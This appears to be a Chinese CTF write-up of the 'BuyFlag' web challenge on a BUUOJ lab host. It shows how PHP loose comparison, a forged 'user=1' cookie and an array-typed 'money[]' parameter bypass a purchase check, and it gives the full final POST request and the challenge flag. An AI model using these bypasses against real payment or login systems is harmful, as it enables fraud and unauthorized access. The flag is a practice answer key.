[極客大挑戰 2019]BuyFlag 1

TazmiDev發表於2024-11-08

[極客大挑戰 2019]BuyFlag 1

開啟例項發現pay.php頁面,有提示資訊

image-20241106212039962

image-20241106213542967

開啟原始碼發現password post提交邏輯

image-20241106212111245

burpsuite抓包傳參,傳入money和password引數,這裡password是==弱比較,所以加個字元就可以繞過

password=404a&money=100000000

image-20241106213935246

回顯發現並沒有變化

注意到學生需要CUIT(Only Cuit's students can buy the FLAG)

image-20241106213725808

嘗試修改頭資訊,將cookie驗證修改為1(0 false,1 ture)

image-20241106214054983

成功繞過身份驗證(我這邊bp不知道為啥一直提示password傳不過去),所以我換了hacker bar提交;這邊顯示密碼正確,身份驗證也對了,但是money錯誤,懷疑是長度問題。(you have not enough money,loser~)

image-20241106215851550

採用陣列繞過,成功獲得flag

password=404a&money[]=100000000

image-20241106220316431

flag{46a2d632-843d-41bf-9a8a-42aac15baf18}

最終payload

POST /pay.php HTTP/1.1
Host: 8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
Connection: keep-alive
Referer: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81/pay.php
Cookie: user=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=404a&money[]=100000000

相關文章